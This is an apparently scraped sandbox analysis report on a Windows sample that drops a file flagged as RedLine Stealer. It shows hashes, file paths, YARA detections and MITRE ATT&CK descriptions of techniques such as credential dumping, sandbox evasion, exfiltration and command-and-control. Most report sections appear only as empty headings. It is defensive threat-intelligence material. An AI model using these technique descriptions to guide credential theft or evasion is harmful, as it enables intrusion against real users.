2021-11-25 17:23:49 UTC	1	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: VYeSXonMT1.exe PID: 6972 Parent PID: 5928

General

Start time:	18:23:30
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\VYeSXonMT1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\VYeSXonMT1.exe"
Imagebase:	0x400000
File size:	680960 bytes
MD5 hash:	0E852A9D4E42120623C0112E53F70992
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AutohotkeyDownloaderGeneric, Description: Yara detected Autohotkey Downloader Generic, Source: 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Evader, Description: Yara detected Evader, Source: 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AutohotkeyDownloaderGeneric, Description: Yara detected Autohotkey Downloader Generic, Source: 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Evader, Description: Yara detected Evader, Source: 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AutohotkeyDownloaderGeneric, Description: Yara detected Autohotkey Downloader Generic, Source: 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Evader, Description: Yara detected Evader, Source: 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: mopnns.exe PID: 6312 Parent PID: 6972

General

Start time:	18:23:46
Start date:	25/11/2021
Path:	C:\Users\user\AppData\Roaming\blair\mopnns.exe
Wow64 process (32bit):	true
Commandline:	mopnns.exe
Imagebase:	0x400000
File size:	292352 bytes
MD5 hash:	3F91E0102D6832F36DA2D908672B2266
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.476408687.0000000004F40000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report VYeSXonMT1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre